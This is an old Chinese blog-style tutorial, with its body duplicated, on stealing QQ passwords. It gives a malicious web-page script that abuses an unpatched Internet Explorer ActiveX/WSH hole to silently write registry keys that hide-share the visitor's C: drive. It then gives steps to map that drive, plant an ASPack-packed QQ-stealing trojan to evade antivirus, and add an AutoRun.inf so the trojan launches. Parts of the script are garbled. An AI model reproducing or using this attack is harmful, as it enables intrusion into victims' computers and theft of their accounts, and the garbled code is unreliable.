黑客通过网页窃取QQ方法解析
2005-09-02 12:06
399 查看
要想偷别人的QQ,方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。方法是:在你的网站网页中加入如下内容的代码:
<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject() Shl.RegWrite("HKLM\\Software\\_blank>Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>
上面的代码大家一定很容易读懂,简单说来就是通过修改对方_blank>注册表中的键值,把对方的C盘共享出来,如果想让对方的其他盘都共享请自行设置。
述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外壳对象。WSH是_blank>微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。WSH使得脚本可以被执行,就象执行批处理一样。以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注册表,就是它们使得对方的硬盘被共享的。把“Flags”的键值设为00000302可以隐藏共享,使对方无法发现,非常隐蔽。
网页做好后,把它上传你的主页空间,骗他浏览你的网页(就看你的嘴皮子功夫了),如果对方的IE没有打补丁(网上这样的电脑有很多),就可以把他的C盘共享出来。整个方法的原理就是把com.ms.activeX.ActiveXComponent对象嵌入<APPLET>标记中,这样会导致任意创建和解释执行ActiveX对象,使我们可以创建任意文件、运行程序、写注册表。未打补丁的IE,在打开含有上述代码的网页时不会有任何警告,我们就是利用这个漏洞把对方的硬盘被共享出来。
等对方中招后,就把对方的硬盘映射过来,可以使用net use命令,也可以使用网络刺客II等软件。下一步可以给对方植入一个盗QQ的软件,比方说QQ杀手等,注意一定要用_blank>ASPack或其他加壳软件给_blank>木马加壳(其实就是另类“压缩”),防止杀毒软件发现。
最后,打开记事本键入以下内容:
[AutoRun]
open=winnt32.exe
保存为AutoRun.inf,其中的winnt32.exe为木马文件。把AutoRun.inf和winnt32.exe一起拷到对方某分区的根目录下。这样,只要他双击该分区就会中木马!这样可以大大的增加木马运行的主动性!须知许多人现在都非常警惕,不熟悉的文件他们轻易的不会运行,而这种方法就很难防范了。
以后,你就等着用邮箱收信收对方的QQ密码吧。
<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject() Shl.RegWrite("HKLM\\Software\\_blank>Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>
上面的代码大家一定很容易读懂,简单说来就是通过修改对方_blank>注册表中的键值,把对方的C盘共享出来,如果想让对方的其他盘都共享请自行设置。
述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外壳对象。WSH是_blank>微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。WSH使得脚本可以被执行,就象执行批处理一样。以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注册表,就是它们使得对方的硬盘被共享的。把“Flags”的键值设为00000302可以隐藏共享,使对方无法发现,非常隐蔽。
网页做好后,把它上传你的主页空间,骗他浏览你的网页(就看你的嘴皮子功夫了),如果对方的IE没有打补丁(网上这样的电脑有很多),就可以把他的C盘共享出来。整个方法的原理就是把com.ms.activeX.ActiveXComponent对象嵌入<APPLET>标记中,这样会导致任意创建和解释执行ActiveX对象,使我们可以创建任意文件、运行程序、写注册表。未打补丁的IE,在打开含有上述代码的网页时不会有任何警告,我们就是利用这个漏洞把对方的硬盘被共享出来。
等对方中招后,就把对方的硬盘映射过来,可以使用net use命令,也可以使用网络刺客II等软件。下一步可以给对方植入一个盗QQ的软件,比方说QQ杀手等,注意一定要用_blank>ASPack或其他加壳软件给_blank>木马加壳(其实就是另类“压缩”),防止杀毒软件发现。
最后,打开记事本键入以下内容:
[AutoRun]
open=winnt32.exe
保存为AutoRun.inf,其中的winnt32.exe为木马文件。把AutoRun.inf和winnt32.exe一起拷到对方某分区的根目录下。这样,只要他双击该分区就会中木马!这样可以大大的增加木马运行的主动性!须知许多人现在都非常警惕,不熟悉的文件他们轻易的不会运行,而这种方法就很难防范了。
以后,你就等着用邮箱收信收对方的QQ密码吧。
相关文章推荐
- Python通过解析网页实现看报程序的方法
- Python通过解析网页实现看报程序的方法
- 通过simpleXML解析XML格式的数据 (两种方法)
- PHP抓取网页、解析HTML常用的方法总结
- 关于使用3G无线网卡能上QQ,却打不开网页的处理方法
- 研究者展示黑客通过GPU绕过防毒软件查杀的方法
- Delphi的WebBrowser改造,对网页中Alter等对话框的改造方法(通过COM来改造)
- ASP.NET中自动生成XML文件并通过XSLT显示在网页中的方法
- Python读取本地文件并解析网页元素的方法
- win7系统 QQ能正常登陆,网页不能正常访问但nslookup与ping都能正常解析网址问题解决
- 在.net中运用HTMLParser解析网页的原理和方法
- Windows 7上可以上QQ,无法访问网页的DNS解析的解决
- 通过网页查看JS源码中汉字显示乱码的解决方法
- 【网络】无法解析服务器的DNS地址?;能登陆QQ,无法打开网页
- QQ号与QQ群的网页上的聊天方法
- asp.net下通过泛解析和伪静态实现二级域名的实现方法
- 在网页中加入新版QQ、MSN在线状态代码的方法
- 通过在jsp页面中比较主机服务器名的方式判断网页表单是不是外部提交方法
- nutch解析网页时NoClassDefFoundError异常解决方法